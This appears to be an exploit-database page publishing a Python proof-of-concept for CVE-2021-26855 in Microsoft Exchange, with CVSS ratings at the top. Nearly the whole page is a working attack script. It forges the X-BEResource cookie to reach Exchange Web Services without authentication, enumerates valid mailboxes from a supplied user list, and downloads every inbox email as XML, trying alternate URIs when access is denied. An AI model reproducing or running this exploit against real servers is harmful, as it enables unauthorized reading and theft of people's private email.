Microsoft Exchange 2019 Unauthenticated Email Download

2021.07.26
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download # Date: 03-11-2021 # Exploit Author: Gonzalo Villegas a.k.a Cl34r # Vendor Homepage: https://www.microsoft.com/ # Version: OWA Exchange 2013 - 2019 # Tested on: OWA 2016 # CVE : CVE-2021-26855 # Details: checking users mailboxes and automated downloads of emails import requests import argparse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) __proxies__ = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"} # for debug on proxy # needs to specifies mailbox, will return folder Id if account exists payload_get_folder_id = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <m:GetFolder> <m:FolderShape> <t:BaseShape>AllProperties</t:BaseShape> </m:FolderShape> <m:FolderIds> <t:DistinguishedFolderId Id="inbox"> <t:Mailbox> <t:EmailAddress>{}</t:EmailAddress> </t:Mailbox> </t:DistinguishedFolderId> </m:FolderIds> </m:GetFolder> </soap:Body> </soap:Envelope> """ # needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) payload_get_items_id_folder = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <m:FindItem Traversal="Shallow"> <m:ItemShape> <BaseShape>AllProperties</BaseShape></m:ItemShape> <SortOrder/> <m:ParentFolderIds> <t:FolderId Id="{}" ChangeKey="{}"/> </m:ParentFolderIds> <QueryString/> </m:FindItem> </soap:Body> </soap:Envelope> """ # needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox payload_get_mail = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetItem xmlns="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" Traversal="Shallow"> <ItemShape> <t:BaseShape>Default</t:BaseShape> </ItemShape> <ItemIds> <t:ItemId Id="{}" ChangeKey="{}"/> </ItemIds> </GetItem> </soap:Body> </soap:Envelope> """ def getFQDN(url): print("[*] Getting FQDN from headers") rs = requests.post(url + "/owa/auth.owa", verify=False, data="evildata") if "X-FEServer" in rs.headers: return rs.headers["X-FEServer"] else: print("[-] Can't get FQDN ") exit(0) def extractEmail(url, uri, user, fqdn, content_folderid, path): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla pwner"} from xml.etree import ElementTree as ET dom = ET.fromstring(content_folderid) for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): id_folder = p[0].attrib.get("Id") change_key_folder = p[0].attrib.get("ChangeKey") data = payload_get_items_id_folder.format(id_folder, change_key_folder) random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"] rs = requests.post(url + uri, data=data, headers=headers, verify=False) if "ErrorAccessDenied" in rs.text: print("[*] Denied ;(.. retrying") t_uri = uri.split("/")[-1] for ru in random_uris: print("[*] Retrying with {}".format(uri.replace(t_uri, ru))) rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) if "NoError" in rs.text: print("[+] data found, dowloading email") break print("[+]Getting mails...") dom_messages = ET.fromstring(rs.text) messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') for m in messages: id_message = m[0].attrib.get("Id") change_key_message = m[0].attrib.get("ChangeKey") data = payload_get_mail.format(id_message, change_key_message) random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"] rs = requests.post(url + uri, data=data, headers=headers, verify=False) if "ErrorAccessDenied" in rs.text: print("[*] Denied ;(.. retrying") t_uri = uri.split("/")[-1] for ru in random_uris: print("[*] Retrying with {}".format(uri.replace(t_uri, ru))) rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) if "NoError" in rs.text: print("[+] data found, downloading email") break try: f = open(path + "/" + user.replace("@", "_").replace(".", "_")+"_"+change_key_message.replace("/", "").replace("\\", "")+".xml", 'w+') f.write(rs.text) f.close() except Exception as e: print("[!] Can't write .xml file to path (email): ", e) def checkURI(url, fqdn): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla hehe"} arr_uri = ["//ecp/xxx.js", "/ecp/favicon.ico", "/ecp/auth.js"] for uri in arr_uri: rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format("thisisnotanvalidmail@pwn.local"), headers=headers) #print(rs.content) if rs.status_code == 200 and "MessageText" in rs.text: print("[+] Valid URI:", uri) calculated_domain = rs.headers["X-CalculatedBETarget"].split(".") if calculated_domain[-2] in ("com", "gov", "gob", "edu", "org"): calculated_domain = calculated_domain[-3] + "." + calculated_domain[-2] + "." + calculated_domain[-1] else: calculated_domain = calculated_domain[-2] + "." + calculated_domain[-1] return uri, calculated_domain #time.sleep(1) print("[-] No valid URI found ;(") exit(0) def checkEmailBoxes(url, uri, user, fqdn, path): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla hehe"} rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), headers=headers) #time.sleep(1) #print(rs.content) if "ResponseCode" in rs.text and "ErrorAccessDenied" in rs.text: print("[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable".format(user)) if "ResponseCode" in rs.text and "NoError" in rs.text: print("[+] Valid Email Found!: {}".format(user)) extractEmail(url, uri, user, fqdn, rs.text, path) if "ResponseCode" in rs.text and "ErrorNonExistentMailbox" in rs.text: print("[-] Not Valid Email: {}".format(user)) def main(): __URL__ = None __FQDN__ = None __mailbox_domain__ = None __path__ = None print("[***** OhhWAA *****]") parser = argparse.ArgumentParser(usage="Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>") parser.add_argument('-u', "--url", help="Url, provide schema and not final / (eg https://example.org)", required=True) parser.add_argument('-l', "--list", help="Users mailbox list", required=True) parser.add_argument("-p", "--path", help="Path to write emails in xml format", required=True) parser.add_argument('-f', "--fqdn", help="FQDN", required=False, default=None) parser.add_argument("-d", "--domain", help="Domain to check mailboxes (eg if .local dont work)", required=False, default=None) args = parser.parse_args() __URL__ = args.url __FQDN__ = args.fqdn __mailbox_domain__ = args.domain __list_users__ = args.list __valid_users__ = [] __path__ = args.path if not __FQDN__: __FQDN__ = getFQDN(__URL__) print("[+] Got FQDN:", __FQDN__) valid_uri, calculated_domain = checkURI(__URL__, __FQDN__) if not __mailbox_domain__: __mailbox_domain__ = calculated_domain list_users = open(__list_users__, "r") for user in list_users: checkEmailBoxes(__URL__, valid_uri, user.strip()+"@"+__mailbox_domain__, __FQDN__, __path__) print("[!!!] FINISHED OhhWAA") if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top